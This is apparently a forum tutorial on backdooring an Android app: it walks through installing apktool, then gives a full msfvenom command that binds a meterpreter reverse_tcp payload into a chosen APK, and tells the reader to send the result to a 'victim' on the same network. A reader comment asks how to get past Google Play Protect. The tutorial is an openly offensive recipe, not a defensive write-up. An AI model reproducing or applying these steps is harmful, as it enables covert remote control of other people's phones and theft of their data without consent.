Hi I am Sanaan. Today i will be showing you How to bind Original Apk into a Payload with msfvenom. So Lets get started
Step 1: Install the Requirements
First we need to download Apktooland The apk which we are going to inject The Payload.
So to download the apktool go to this link bitbucket.org/iBotPeaches/apktool/downloads/
And Download the Latest Version of Apktool and then rename it to apktool.jar . And now we need to download the linux wrapper script if your on other OS please download their wrapper script for now.
I am using Kali so Here is the Linux Wraper Script raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool Now save it as apktool. Move apktool.jar and apktool to
/usr/local/bin
/usr/local/sbin
/usr/bin/
/usr/sbin/
After That type apktool in the terminal to verify if its working and then if you see this on top. Picked up JAVAOPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Then you have to type this command whenever you are using apktool *SILENTJAVAOPTIONS="$JAVA_OPTIONS"
unset JAVAOPTIONS
alias='java "$SILENTJAVA_OPTIONS"'*
Remember to write this on your notepad. You have to copy and paste this in terminal
And now install your apk file of your choice
Step 2: Lets Try It
Type msfvenom -x yourapkfilename.apk -p android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=4444 -o /root/Desktop/yourbackdooredapkfilename.apk
And Our Backdoor apk is Created
Step 3: Send It to Your Victim Who Is in the Same Network
Finally send it to your victim. Who is in The Same Network As You
Hope You Like My Post. And this MY Very First Post and i will be doing a part-2 Which is in the same concept but using ngrok. And If You Have Any Problems Please let me know Bye
2 Responses
anyone got anything new on Google play protect for apk payload.
It still shows "Picked up JAVAOPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true" while starting apktool. How do I fix this?
Share Your Thoughts